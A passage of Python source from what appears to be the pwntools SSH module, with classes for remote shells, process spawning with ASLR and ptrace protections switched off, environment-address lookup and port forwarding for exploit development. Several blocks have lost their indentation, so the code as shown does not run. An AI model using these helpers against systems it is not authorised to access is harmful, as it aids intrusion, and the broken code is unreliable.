            self.sock.set_combine_stderr(True)

            self.settimeout(self.timeout)

            if process:
                self.sock.exec_command(process)
            else:
                self.sock.invoke_shell()

            h.success()

    def kill(self):
        """kill()

        Kills the process.
        """
        self.close()

    def recvall(self, timeout = sock.forever):
        # We subclass tubes.sock which sets self.sock to None.
        #
        # However, we need to wait for the return value to propagate,
        # which may not happen by the time .close() is called by tube.recvall()
        tmp_sock = self.sock

        timeout = self.maximum if self.timeout is self.forever else self.timeout
        data = super(ssh_channel, self).recvall(timeout)

        # Restore self.sock to be able to call wait()
        self.sock = tmp_sock
        self.wait()

        # Again set self.sock to None
        self.sock = None

        return data

    def wait(self):
        return self.poll(block=True)

    def poll(self, block=False):
        """poll() -> int

        Poll the exit code of the process. Will return None, if the
        process has not yet finished and the exit code otherwise.
        """
        # `is None` instead of `== None` (idiomatic, same behavior here).
        if self.returncode is None and self.sock \
        and (block or self.sock.exit_status_ready()):
            while not self.sock.status_event.is_set():
                self.sock.status_event.wait(0.05)
            self.returncode = self.sock.recv_exit_status()

        return self.returncode

    def can_recv_raw(self, timeout):
        with self.countdown(timeout):
            while self.countdown_active():
                if self.sock.recv_ready():
                    return True
                time.sleep(min(self.timeout, 0.05))
        return False

    def interactive(self, prompt = term.text.bold_red('$') + ' '):
        """interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')

        If not in TTY-mode, this does exactly the same as
        meth:`pwnlib.tubes.tube.tube.interactive`, otherwise
        it does mostly the same.

        An SSH connection in TTY-mode will typically supply its own prompt,
        thus the prompt argument is ignored in this case.

        We also have a few SSH-specific hacks that will ideally be removed
        once the :mod:`pwnlib.term` is more mature.
        """
        # If we are only executing a regular old shell, we need to handle
        # control codes (specifically Ctrl+C).
        #
        # Otherwise, we can just punt to the default implementation of interactive()
        if self.process is not None:
            return super(ssh_channel, self).interactive(prompt)

        self.info('Switching to interactive mode')

        # We would like a cursor, please!
        term.term.show_cursor()

        event = threading.Event()
        def recv_thread(event):
            # Pump remote output to stdout until EOF or the event fires.
            while not event.is_set():
                try:
                    cur = self.recv(timeout = 0.05)
                    cur = cur.replace('\r\n','\n')
                    cur = cur.replace('\r','')
                    if cur is None:
                        continue
                    elif cur == '\a':
                        # Ugly hack until term unstands bell characters
                        continue
                    sys.stdout.write(cur)
                    sys.stdout.flush()
                except EOFError:
                    self.info('Got EOF while reading in interactive')
                    event.set()
                    break

        t = context.Thread(target = recv_thread, args = (event,))
        t.daemon = True
        t.start()

        while not event.is_set():
            if term.term_mode:
                try:
                    data = term.key.getraw(0.1)
                except KeyboardInterrupt:
                    data = [3] # This is ctrl-c
                except IOError:
                    if not event.is_set():
                        raise
            else:
                data = sys.stdin.read(1)
                if not data:
                    event.set()
                else:
                    data = [ord(data)]

            if data:
                try:
                    self.send(''.join(chr(c) for c in data))
                except EOFError:
                    event.set()
                    self.info('Got EOF while sending in interactive')

        while t.is_alive():
            t.join(timeout = 0.1)

        # Restore
        term.term.hide_cursor()

    def close(self):
        self.poll()
        # Unhook the window-resize callback (may appear more than once).
        while self.resizer in term.term.on_winch:
            term.term.on_winch.remove(self.resizer)
        super(ssh_channel, self).close()

    def spawn_process(self, *args, **kwargs):
        self.error("Cannot use spawn_process on an SSH channel.")

    def _close_msg(self):
        self.info('Closed SSH channel with %s' % self.host)
class ssh_process(ssh_channel):
    """ssh_channel that represents a spawned remote process with a known
    pid/executable/argv (see :meth:`ssh.process`)."""

    #: Working directory
    cwd = None

    #: PID of the process
    #: Only valid when instantiated through :meth:`ssh.process`
    pid = None

    #: Executable of the process
    #: Only valid when instantiated through :meth:`ssh.process`
    executable = None

    #: Arguments passed to the process
    #: Only valid when instantiated through :meth:`ssh.process`
    argv = None

    def libs(self):
        """libs() -> dict

        Returns a dictionary mapping the address of each loaded library in the
        process's address space.

        If ``/proc/$PID/maps`` cannot be opened, the output of ldd is used
        verbatim, which may be different than the actual addresses if ASLR
        is enabled.
        """
        maps = self.parent.libs(self.executable)

        maps_raw = self.parent.cat('/proc/%d/maps' % self.pid)

        for lib in maps:
            remote_path = lib.split(self.parent.host)[-1]
            for line in maps_raw.splitlines():
                if line.endswith(remote_path):
                    address = line.split('-')[0]
                    maps[lib] = int(address, 16)
                    break

        return maps

    @property
    def libc(self):
        """libc() -> ELF

        Returns an ELF for the libc for the current process.
        If possible, it is adjusted to the correct address
        automatically.
        """
        from pwnlib.elf import ELF

        for lib, address in self.libs().items():
            if 'libc.so' in lib:
                e = ELF(lib)
                e.address = address
                return e
        # NOTE: implicitly returns None when no libc mapping is found.

    @property
    def elf(self):
        """elf() -> pwnlib.elf.elf.ELF

        Returns an ELF file for the executable that launched the process.
        """
        import pwnlib.elf.elf

        libs = self.parent.libs(self.executable)

        for lib in libs:
            # Cannot just check "executable in lib", see issue #1047
            if lib.endswith(self.executable):
                return pwnlib.elf.elf.ELF(lib)

    @property
    def corefile(self):
        import pwnlib.elf.corefile
        finder = pwnlib.elf.corefile.CorefileFinder(self)
        if not finder.core_path:
            self.error("Could not find core file for pid %i" % self.pid)
        return pwnlib.elf.corefile.Corefile(finder.core_path)

    def getenv(self, variable, **kwargs):
        """Retrieve the address of an environment variable in the remote process.
        """
        argv0 = self.argv[0]
        # Launch a throwaway remote python (argv[0] spoofed to match this
        # process) and use libc's getenv to locate the variable; the
        # length difference between the interpreter path and the real
        # executable path corrects the environment offset.
        script = ';'.join(('from ctypes import *',
                           'import os',
                           'libc = CDLL("libc.so.6")',
                           'print os.path.realpath(%r)' % self.executable,
                           'print(libc.getenv(%r))' % variable,))

        try:
            with context.local(log_level='error'):
                python = self.parent.which('python')

                if not python:
                    self.error("Python is not installed on the remote system.")

                io = self.parent.process([argv0,'-c', script.strip()],
                                         executable=python,
                                         env=self.env,
                                         **kwargs)

            path = io.recvline()
            address = int(io.recvline())

            address -= len(python)
            address += len(path)

            return int(address) & context.mask
        # BUG FIX: was a bare `except:`, which also swallowed
        # SystemExit/KeyboardInterrupt raised while talking to the remote.
        except Exception:
            self.exception("Could not look up environment variable %r" % variable)

    def _close_msg(self):
        # If we never completely started up, just use the parent implementation
        if self.executable is None:
            return super(ssh_process, self)._close_msg()

        self.info('Stopped remote process %r on %s (pid %i)' \
                  % (os.path.basename(self.executable),
                     self.host,
                     self.pid))
class ssh_connecter(sock):
    """Outbound TCP connection tunnelled through the parent SSH transport
    (a 'direct-tcpip' channel)."""

    def __init__(self, parent, host, port, *a, **kw):
        super(ssh_connecter, self).__init__(*a, **kw)

        # Hold a reference so the parent is not garbage collected while
        # this tunnel is alive.
        self.parent = parent

        self.host = parent.host
        self.rhost = host
        self.rport = port

        status = 'Connecting to %s:%d via SSH to %s' % (self.rhost, self.rport, self.host)
        with self.waitfor(status) as h:
            try:
                self.sock = parent.transport.open_channel('direct-tcpip', (host, port), ('127.0.0.1', 0))
            except Exception as e:
                self.exception(e.message)
                raise

            local_name = self.sock.get_transport().sock.getsockname()
            self.lhost, self.lport = local_name[0], local_name[1]

            h.success()

    def spawn_process(self, *args, **kwargs):
        self.error("Cannot use spawn_process on an SSH channel.")

    def _close_msg(self):
        self.info("Closed remote connection to %s:%d via SSH connection to %s" % (self.rhost, self.rport, self.host))
class ssh_listener(sock):
    """Remote port-forward listener: asks the SSH server to listen on a
    port and accepts one connection back through the transport."""

    def __init__(self, parent, bind_address, port, *a, **kw):
        super(ssh_listener, self).__init__(*a, **kw)

        # keep the parent from being garbage collected in some cases
        self.parent = parent

        self.host = parent.host

        try:
            self.port = parent.transport.request_port_forward(bind_address, port)
        except Exception:
            # BUG FIX: this handler previously called h.failure(...), but
            # `h` is only defined inside accepter() below — the original
            # raised NameError here instead of reporting the failure.
            self.exception('Failed create a port forwarding')
            raise

        def accepter():
            msg = 'Waiting on port %d via SSH to %s' % (self.port, self.host)
            h = self.waitfor(msg)
            try:
                self.sock = parent.transport.accept()
                parent.transport.cancel_port_forward(bind_address, self.port)
            except Exception:
                self.sock = None
                h.failure()
                self.exception('Failed to get a connection')
                return

            self.rhost, self.rport = self.sock.origin_addr
            h.success('Got connection from %s:%d' % (self.rhost, self.rport))

        # Accept in the background so the constructor returns immediately.
        self._accepter = context.Thread(target = accepter)
        self._accepter.daemon = True
        self._accepter.start()

    def _close_msg(self):
        self.info("Closed remote connection to %s:%d via SSH listener on port %d via %s" % (self.rhost, self.rport, self.port, self.host))

    def spawn_process(self, *args, **kwargs):
        self.error("Cannot use spawn_process on an SSH channel.")

    def wait_for_connection(self):
        """Blocks until a connection has been established."""
        # Touching .sock goes through __getattr__, which joins the
        # accepter thread.
        _ = self.sock
        return self

    def __getattr__(self, key):
        if key == 'sock':
            # Block until the accepter thread has set self.sock.
            while self._accepter.is_alive():
                self._accepter.join(timeout = 0.1)
            return self.sock
        else:
            return getattr(super(ssh_listener, self), key)
class ssh(Timeout, Logger):
    """SSH connection object backed by paramiko.
    Provides remote process execution, file transfer (with a local download
    cache), and TCP port forwarding in both directions.
    """
    #: Remote host name (``str``)
    host = None
    #: Remote port (``int``)
    port = None
    #: Working directory (``str``)
    cwd = None
    #: Enable caching of SSH downloads (``bool``)
    cache = True
    #: Paramiko SSHClient which backs this object
    client = None
    #: Paramiko SFTPClient object which is used for file transfers.
    #: Set to :const:`None` to disable ``sftp``.
    sftp = None
    #: PID of the remote ``sshd`` process servicing this connection.
    pid = None
def __init__(self, user, host, port = 22, password = None, key = None,
keyfile = None, proxy_command = None, proxy_sock = None,
level = None, cache = True, ssh_agent = False, *a, **kw):
"""Creates a new ssh connection.
Arguments:
user(str): The username to log in with
host(str): The hostname to connect to
port(int): The port to connect to
password(str): Try to authenticate using this password
key(str): Try to authenticate using this private key. The string should be the actual private key.
keyfile(str): Try to authenticate using this private key. The string should be a filename.
proxy_command(str): Use this as a proxy command. It has approximately the same semantics as ProxyCommand from ssh(1).
proxy_sock(str): Use this socket instead of connecting to the host.
timeout: Timeout, in seconds
level: Log level
cache: Cache downloaded files (by hash/size/timestamp)
ssh_agent: If :const:`True`, enable usage of keys via ssh-agent
NOTE: The proxy_command and proxy_sock arguments is only available if a
fairly new version of paramiko is used."""
super(ssh, self).__init__(*a, **kw)
Logger.__init__(self)
if level is not None:
self.setLevel(level)
self.host = host
self.port = port
self.user = user
self.password = password
self.key = key
self.keyfile = keyfile
self._cachedir = os.path.join(tempfile.gettempdir(), 'pwntools-ssh-cache')
self.cwd = '.'
self.cache = cache
# Deferred attributes
self._platform_info = {}
self._aslr = None
self._aslr_ulimit = None
misc.mkdir_p(self._cachedir)
# This is a dirty hack to make my Yubikey shut up.
# If anybody has a problem with this, please open a bug and I'll
# figure out a better workaround.
if not ssh_agent:
os.environ.pop('SSH_AUTH_SOCK', None)
import paramiko
# Make a basic attempt to parse the ssh_config file
try:
config_file = os.path.expanduser('~/.ssh/config')
if os.path.exists(config_file):
ssh_config = paramiko.SSHConfig()
ssh_config.parse(file(config_file))
host_config = ssh_config.lookup(host)
if 'hostname' in host_config:
self.host = host = host_config['hostname']
if not keyfile and 'identityfile' in host_config:
keyfile = host_config['identityfile'][0]
if keyfile.lower() == 'none':
keyfile = None
except Exception as e:
self.debug("An error occurred while parsing ~/.ssh/config:\n%s" % e)
keyfiles = [os.path.expanduser(keyfile)] if keyfile else []
msg = 'Connecting to %s on port %d' % (host, port)
with self.waitfor(msg) as h:
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
known_hosts = os.path.expanduser('~/.ssh/known_hosts')
if os.path.exists(known_hosts):
self.client.load_host_keys(known_hosts)
has_proxy = (proxy_sock or proxy_command) and True
if has_proxy:
if 'ProxyCommand' not in dir(paramiko):
self.error('This version of paramiko does not support proxies.')
if proxy_sock and proxy_command:
self.error('Cannot have both a proxy command and a proxy sock')
if proxy_command:
proxy_sock = paramiko.ProxyCommand(proxy_command)
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True, sock = proxy_sock)
else:
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True)
self.transport = self.client.get_transport()
self.transport.use_compression(True)
h.success()
self._tried_sftp = False
with context.local(log_level='error'):
def getppid():
import os
print(os.getppid())
try:
self.pid = int(self.process('false', preexec_fn=getppid).recvall())
except Exception:
self.pid = None
try:
self.info_once(self.checksec())
except Exception:
self.warn_once("Couldn't check security settings on %r" % self.host)
@property
def sftp(self):
if not self._tried_sftp:
try:
self._sftp = self.transport.open_sftp_client()
except Exception:
self._sftp = None
self._tried_sftp = True
return self._sftp
@sftp.setter
def sftp(self, value):
self._sftp = value
self._tried_sftp = True
    def __enter__(self, *a):
        # Context-manager support: ``with ssh(...) as s: ...``
        return self
    def __exit__(self, *a, **kw):
        # Close the underlying SSH connection when the ``with`` block exits.
        self.close()
    def shell(self, shell = None, tty = True, timeout = Timeout.default):
        """shell(shell = None, tty = True, timeout = Timeout.default) -> ssh_channel
        Open a new channel with a shell inside.
        Arguments:
            shell(str): Path to the shell program to run.
                If :const:`None`, uses the default shell for the logged in user.
            tty(bool): If :const:`True`, then a TTY is requested on the remote server.
            timeout: Timeout for the resulting channel, in seconds.
        Returns:
            Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
        Examples:
            >>> s = ssh(host='example.pwnme',
            ...         user='travis',
            ...         password='demopass')
            >>> sh = s.shell('/bin/sh')
            >>> sh.sendline('echo Hello; exit')
            >>> print 'Hello' in sh.recvall()
            True
        """
        # A shell is just an ordinary command run through self.run().
        return self.run(shell, tty, timeout = timeout)
def process(self, argv=None, executable=None, tty=True, cwd=None, env=None, timeout=Timeout.default, run=True,
stdin=0, stdout=1, stderr=2, preexec_fn=None, preexec_args=[], raw=True, aslr=None, setuid=None,
shell=False):
r"""
Executes a process on the remote server, in the same fashion
as pwnlib.tubes.process.process.
To achieve this, a Python script is created to call ``os.execve``
with the appropriate arguments.
As an added bonus, the ``ssh_channel`` object returned has a
``pid`` property for the process pid.
Arguments:
argv(list):
List of arguments to pass into the process
executable(str):
Path to the executable to run.
If :const:`None`, ``argv[0]`` is used.
tty(bool):
Request a `tty` from the server. This usually fixes buffering problems
by causing `libc` to write data immediately rather than buffering it.
However, this disables interpretation of control codes (e.g. Ctrl+C)
and breaks `.shutdown`.
cwd(str):
Working directory. If :const:`None`, uses the working directory specified
on :attr:`cwd` or set via :meth:`set_working_directory`.
env(dict):
Environment variables to set in the child. If :const:`None`, inherits the
default environment.
timeout(int):
Timeout to set on the `tube` created to interact with the process.
run(bool):
Set to :const:`True` to run the program (default).
If :const:`False`, returns the path to an executable Python script on the
remote server which, when executed, will do it.
stdin(int, str):
If an integer, replace stdin with the numbered file descriptor.
If a string, a open a file with the specified path and replace
stdin with its file descriptor. May also be one of ``sys.stdin``,
``sys.stdout``, ``sys.stderr``. If :const:`None`, the file descriptor is closed.
stdout(int, str):
See ``stdin``.
stderr(int, str):
See ``stdin``.
preexec_fn(callable):
Function which is executed on the remote side before execve().
This **MUST** be a self-contained function -- it must perform
all of its own imports, and cannot refer to variables outside
its scope.
preexec_args(object):
Argument passed to ``preexec_fn``.
This **MUST** only consist of native Python objects.
raw(bool):
If :const:`True`, disable TTY control code interpretation.
aslr(bool):
See :class:`pwnlib.tubes.process.process` for more information.
setuid(bool):
See :class:`pwnlib.tubes.process.process` for more information.
shell(bool):
Pass the command-line arguments to the shell.
Returns:
A new SSH channel, or a path to a script if ``run=False``.
Notes:
Requires Python on the remote server.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> sh = s.process('/bin/sh', env={'PS1':''})
>>> sh.sendline('echo Hello; exit')
>>> sh.recvall()
'Hello\n'
>>> s.process(['/bin/echo', '\xff']).recvall()
'\xff\n'
>>> s.process(['readlink', '/proc/self/exe']).recvall()
'/bin/readlink\n'
>>> s.process(['LOLOLOL', '/proc/self/exe'], executable='readlink').recvall()
'/bin/readlink\n'
>>> s.process(['LOLOLOL\x00', '/proc/self/cmdline'], executable='cat').recvall()
'LOLOLOL\x00/proc/self/cmdline\x00'
>>> sh = s.process(executable='/bin/sh')
>>> sh.pid in pidof('sh') # doctest: +SKIP
True
>>> s.process(['pwd'], cwd='/tmp').recvall()
'/tmp\n'
>>> p = s.process(['python','-c','import os; print os.read(2, 1024)'], stderr=0)
>>> p.send('hello')
>>> p.recv()
'hello\n'
>>> s.process(['/bin/echo', 'hello']).recvall()
'hello\n'
>>> s.process(['/bin/echo', 'hello'], stdout='/dev/null').recvall()
''
>>> s.process(['/usr/bin/env'], env={}).recvall()
''
>>> s.process('/usr/bin/env', env={'A':'B'}).recvall()
'A=B\n'
>>> s.process('false', preexec_fn=1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn must be a function
>>> s.process('false', preexec_fn=lambda: 1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn cannot be a lambda
>>> def uses_globals():
... foo = bar
>>> print s.process('false', preexec_fn=uses_globals).recvall().strip() # doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: global name 'bar' is not defined
>>> s.process('echo hello', shell=True).recvall()
'hello\n'
"""
if not argv and not executable:
self.error("Must specify argv or executable")
argv = argv or []
aslr = aslr if aslr is not None else context.aslr
if isinstance(argv, (str, unicode)):
argv = [argv]
if not isinstance(argv, (list, tuple)):
self.error('argv must be a list or tuple')
if shell:
if len(argv) != 1:
self.error('Cannot provide more than 1 argument if shell=True')
argv = ['/bin/sh', '-c'] + argv
# Python doesn't like when an arg in argv contains '\x00'
# -> execve() arg 2 must contain only strings
for i, arg in enumerate(argv):
if '\x00' in arg[:-1]:
self.error('Inappropriate nulls in argv[%i]: %r' % (i, arg))
argv[i] = arg.rstrip('\x00')
# Python also doesn't like when envp contains '\x00'
if env and hasattr(env, 'items'):
for k, v in env.items():
if '\x00' in k[:-1]:
self.error('Inappropriate nulls in environment key %r' % k)
if '\x00' in v[:-1]:
self.error('Inappropriate nulls in environment value %r=%r' % (k, v))
env[k.rstrip('\x00')] = v.rstrip('\x00')
executable = executable or argv[0]
cwd = cwd or self.cwd
# Validate, since failures on the remote side will suck.
if not isinstance(executable, str):
self.error("executable / argv[0] must be a string: %r" % executable)
if not isinstance(argv, (list, tuple)):
self.error("argv must be a list or tuple: %r" % argv)
if env is not None and not isinstance(env, dict) and env != os.environ:
self.error("env must be a dict: %r" % env)
if not all(isinstance(s, str) for s in argv):
self.error("argv must only contain strings: %r" % argv)
# Allow passing in sys.stdin/stdout/stderr objects
handles = {sys.stdin: 0, sys.stdout:1, sys.stderr:2}
stdin = handles.get(stdin, stdin)
stdout = handles.get(stdout, stdout)
stderr = handles.get(stderr, stderr)
# Allow the user to provide a self-contained function to run
def func(): pass
func = preexec_fn or func
func_args = preexec_args
if not isinstance(func, types.FunctionType):
self.error("preexec_fn must be a function")
func_name = func.__name__
if func_name == (lambda: 0).__name__:
self.error("preexec_fn cannot be a lambda")
func_src = inspect.getsource(func).strip()
setuid = True if setuid is None else bool(setuid)
script = r"""
#!/usr/bin/env python2
import os, sys, ctypes, resource, platform, stat
from collections import OrderedDict
exe = %(executable)r
argv = %(argv)r
env = %(env)r
os.chdir(%(cwd)r)
if env is not None:
os.environ.clear()
os.environ.update(env)
else:
env = os.environ
def is_exe(path):
return os.path.isfile(path) and os.access(path, os.X_OK)
PATH = os.environ.get('PATH','').split(os.pathsep)
if os.path.sep not in exe and not is_exe(exe):
for path in PATH:
test_path = os.path.join(path, exe)
if is_exe(test_path):
exe = test_path
break
if not is_exe(exe):
sys.stderr.write('3\n')
sys.stderr.write("{} is not executable or does not exist in $PATH: {}".format(exe,PATH))
sys.exit(-1)
if not %(setuid)r:
PR_SET_NO_NEW_PRIVS = 38
result = ctypes.CDLL('libc.so.6').prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)
if result != 0:
sys.stdout.write('3\n')
sys.stdout.write("Could not disable setuid: prctl(PR_SET_NO_NEW_PRIVS) failed")
sys.exit(-1)
try:
PR_SET_PTRACER = 0x59616d61
PR_SET_PTRACER_ANY = -1
ctypes.CDLL('libc.so.6').prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY, 0, 0, 0)
except Exception:
pass
# Determine what UID the process will execute as
# This is used for locating apport core dumps
suid = os.getuid()
sgid = os.getgid()
st = os.stat(exe)
if %(setuid)r:
if (st.st_mode & stat.S_ISUID):
suid = st.st_uid
if (st.st_mode & stat.S_ISGID):
sgid = st.st_gid
if sys.argv[-1] == 'check':
sys.stdout.write("1\n")
sys.stdout.write(str(os.getpid()) + "\n")
sys.stdout.write(str(os.getuid()) + "\n")
sys.stdout.write(str(os.getgid()) + "\n")
sys.stdout.write(str(suid) + "\n")
sys.stdout.write(str(sgid) + "\n")
sys.stdout.write(os.path.realpath(exe) + '\x00')
sys.stdout.flush()
for fd, newfd in {0: %(stdin)r, 1: %(stdout)r, 2:%(stderr)r}.items():
if newfd is None:
close(fd)
elif isinstance(newfd, str):
os.close(fd)
os.open(newfd, os.O_RDONLY if fd == 0 else (os.O_RDWR|os.O_CREAT))
elif isinstance(newfd, int) and newfd != fd:
os.dup2(fd, newfd)
if not %(aslr)r:
if platform.system().lower() == 'linux' and %(setuid)r is not True:
ADDR_NO_RANDOMIZE = 0x0040000
ctypes.CDLL('libc.so.6').personality(ADDR_NO_RANDOMIZE)
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
# Attempt to dump ALL core file regions
try:
with open('/proc/self/coredump_filter', 'w') as core_filter:
core_filter.write('0x3f\n')
except Exception:
pass
# Assume that the user would prefer to have core dumps.
try:
resource.setrlimit(resource.RLIMIT_CORE, (-1, -1))
except Exception:
pass
%(func_src)s
apply(%(func_name)s, %(func_args)r)
os.execve(exe, argv, env)
""" % locals()
script = script.strip()
self.debug("Created execve script:\n" + script)
if not run:
with context.local(log_level='error'):
tmpfile = self.mktemp('-t', 'pwnlib-execve-XXXXXXXXXX')
self.chmod('+x', tmpfile)
self.info("Uploading execve script to %r" % tmpfile)
self.upload_data(script, tmpfile)
return tmpfile
if self.isEnabledFor(logging.DEBUG):
execve_repr = "execve(%r, %s, %s)" % (executable,
argv,
'os.environ'
if (env in (None, os.environ))
else env)
# Avoid spamming the screen
if self.isEnabledFor(logging.DEBUG) and len(execve_repr) > 512:
execve_repr = execve_repr[:512] + '...'
else:
execve_repr = repr(executable)
msg = 'Starting remote process %s on %s' % (execve_repr, self.host)
with self.progress(msg) as h:
script = 'for py in python2.7 python2 python; do test -x "$(which $py 2>&1)" && exec $py -c %s check; done; echo 2' % sh_string(script)
with context.local(log_level='error'):
python = ssh_process(self, script, tty=True, raw=True, level=self.level, timeout=self.timeout)
try:
result = safeeval.const(python.recvline())
except Exception:
h.failure("Process creation failed")
self.warn_once('Could not find a Python2 interpreter on %s\n' % self.host \
+ "Use ssh.run() instead of ssh.process()")
return None
# If an error occurred, try to grab as much output
# as we can.
if result != 1:
error_message = python.recvrepeat(timeout=1)
if result == 0:
self.error("%r does not exist or is not executable" % executable)
elif result == 3:
self.error(error_message)
elif result == 2:
self.error("python is not installed on the remote system %r" % self.host)
elif result != 1:
h.failure("something bad happened:\n%s" % error_message)
python.pid = safeeval.const(python.recvline())
python.uid = safeeval.const(python.recvline())
python.gid = safeeval.const(python.recvline())
python.suid = safeeval.const(python.recvline())
python.sgid = safeeval.const(python.recvline())
python.argv = argv
python.executable = python.recvuntil('\x00')[:-1]
h.success('pid %i' % python.pid)
if aslr == False and setuid and (python.uid != python.suid or python.gid != python.sgid):
effect = "partial" if self.aslr_ulimit else "no"
message = "Specfied aslr=False on setuid binary %s\n" % python.executable
message += "This will have %s effect. Add setuid=False to disable ASLR for debugging.\n" % effect
if self.aslr_ulimit:
message += "Unlimited stack size should de-randomize shared libraries."
self.warn_once(message)
elif not aslr:
self.warn_once("ASLR is disabled for %r!" % python.executable)
return python
def which(self, program):
"""which(program) -> str
Minor modification to just directly invoking ``which`` on the remote
system which adds the current working directory to the end of ``$PATH``.
"""
# If name is a path, do not attempt to resolve it.
if os.path.sep in program:
return program
result = self.run('export PATH=$PATH:$PWD; which %s' % program).recvall().strip()
if ('/%s' % program) not in result:
return None
return result
def system(self, process, tty = True, wd = None, env = None, timeout = None, raw = True):
r"""system(process, tty = True, wd = None, env = None, timeout = Timeout.default, raw = True) -> ssh_channel
Open a new channel with a specific process inside. If `tty` is True,
then a TTY is requested on the remote server.
If `raw` is True, terminal control codes are ignored and input is not
echoed back.
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> py = s.run('python -i')
>>> _ = py.recvuntil('>>> ')
>>> py.sendline('print 2+2')
>>> py.sendline('exit')
>>> print repr(py.recvline())
'4\n'
"""
if wd is None:
wd = self.cwd
if timeout is None:
timeout = self.timeout
return ssh_channel(self, process, tty, wd, env, timeout = timeout, level = self.level, raw = raw)
#: Backward compatibility. Use :meth:`system`
run = system
    def getenv(self, variable, **kwargs):
        """Retrieve the address of an environment variable on the remote
        system.
        Note:
            The exact address will differ based on what other environment
            variables are set, as well as argv[0]. In order to ensure that
            the path is *exactly* the same, it is recommended to invoke the
            process with ``argv=[]``.
        """
        # One-liner for the remote (Python 2) interpreter: print the pointer
        # returned by libc getenv(3).
        # NOTE(review): no restype is declared for libc.getenv, so ctypes
        # returns a C int -- on 64-bit targets the pointer may be truncated,
        # and the mask below cannot recover the lost high bits. TODO confirm.
        script = '''
from ctypes import *; libc = CDLL('libc.so.6'); print(libc.getenv(%r))
''' % variable
        with context.local(log_level='error'):
            python = self.which('python')
            if not python:
                self.error("Python is not installed on the remote system.")
            # argv[0] is deliberately empty so the environment layout stays
            # deterministic (see the docstring note).
            io = self.process(['','-c', script.strip()], executable=python, **kwargs)
            result = io.recvall()
        try:
            return int(result) & context.mask
        except:
            # Deliberate broad catch: report any failure via the logger.
            self.exception("Could not look up environment variable %r" % variable)
def run_to_end(self, process, tty = False, wd = None, env = None):
r"""run_to_end(process, tty = False, timeout = Timeout.default, env = None) -> str
Run a command on the remote server and return a tuple with
(data, exit_status). If `tty` is True, then the command is run inside
a TTY on the remote server.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> print s.run_to_end('echo Hello; exit 17')
('Hello\n', 17)
"""
with context.local(log_level = 'ERROR'):
c = self.run(process, tty, wd = wd, timeout = Timeout.default)
data = c.recvall()
retcode = c.wait()
c.close()
return data, retcode
    def connect_remote(self, host, port, timeout = Timeout.default):
        r"""connect_remote(host, port, timeout = Timeout.default) -> ssh_connecter
        Connects to a host through an SSH connection. This is equivalent to
        using the ``-L`` flag on ``ssh``.
        Returns a :class:`pwnlib.tubes.ssh.ssh_connecter` object.
        Examples:
            >>> from pwn import *
            >>> l = listen()
            >>> s = ssh(host='example.pwnme',
            ...         user='travis',
            ...         password='demopass')
            >>> a = s.connect_remote(s.host, l.lport)
            >>> b = l.wait_for_connection()
            >>> a.sendline('Hello')
            >>> print repr(b.recvline())
            'Hello\n'
        """
        # The outbound connection is made from the remote side, tunneled
        # through the existing paramiko transport.
        return ssh_connecter(self, host, port, timeout, level=self.level)
    #: Alias for :meth:`connect_remote`
    remote = connect_remote
    def listen_remote(self, port = 0, bind_address = '', timeout = Timeout.default):
        r"""listen_remote(port = 0, bind_address = '', timeout = Timeout.default) -> ssh_connecter
        Listens remotely through an SSH connection. This is equivalent to
        using the ``-R`` flag on ``ssh``.
        Returns a :class:`pwnlib.tubes.ssh.ssh_listener` object.
        Examples:
            >>> from pwn import *
            >>> s = ssh(host='example.pwnme',
            ...         user='travis',
            ...         password='demopass')
            >>> l = s.listen_remote()
            >>> a = remote(s.host, l.port)
            >>> b = l.wait_for_connection()
            >>> a.sendline('Hello')
            >>> print repr(b.recvline())
            'Hello\n'
        """
        # port=0 asks the remote sshd to pick a free port; see l.port.
        return ssh_listener(self, bind_address, port, timeout, level=self.level)
    #: Alias for :meth:`listen_remote`
    listen = listen_remote
    def __getitem__(self, attr):
        """Permits indexed access to run commands over SSH
        Examples:
            >>> s = ssh(host='example.pwnme',
            ...         user='travis',
            ...         password='demopass')
            >>> print s['echo hello']
            hello
        """
        # Delegates to __getattr__, which builds a remote-command runner.
        return self.__getattr__(attr)()
    def __call__(self, attr):
        """Permits function-style access to run commands over SSH
        Examples:
            >>> s = ssh(host='example.pwnme',
            ...         user='travis',
            ...         password='demopass')
            >>> print repr(s('echo hello'))
            'hello'
        """
        # Delegates to __getattr__, which builds a remote-command runner.
        return self.__getattr__(attr)()
def __getattr__(self, attr):
"""Permits member access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.echo('hello')
'hello'
>>> s.whoami()
'travis'
>>> s.echo(['huh','yay','args'])
'huh yay args'
"""
bad_attrs = [
'trait_names', # ipython tab-complete
]
if attr in self.__dict__ \
or attr in bad_attrs \
or attr.startswith('_'):
raise AttributeError
def runner(*args):
if len(args) == 1 and isinstance(args[0], (list, tuple)):
command = [attr] + args[0]
else:
command = ' '.join((attr,) + args)
return self.run(command).recvall().strip()
return runner
def connected(self):
"""Returns True if we are connected.
Example:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.connected()
True
>>> s.close()
>>> s.connected()
False
"""
return bool(self.client and self.client.get_transport().is_active())
def close(self):
"""Close the connection."""
if self.client:
self.client.close()
self.client = None
self.info("Closed connection to %r" % self.host)
def _libs_remote(self, remote):
"""Return a dictionary of the libraries used by a remote file."""
escaped_remote = sh_string(remote)
cmd = ''.join([
'(',
'ulimit -s unlimited;',
'ldd %s > /dev/null &&' % escaped_remote,
'(',
'LD_TRACE_LOADED_OBJECTS=1 %s||' % escaped_remote,
'ldd %s' % escaped_remote,
'))',
' 2>/dev/null'
])
data, status = self.run_to_end(cmd)
if status != 0:
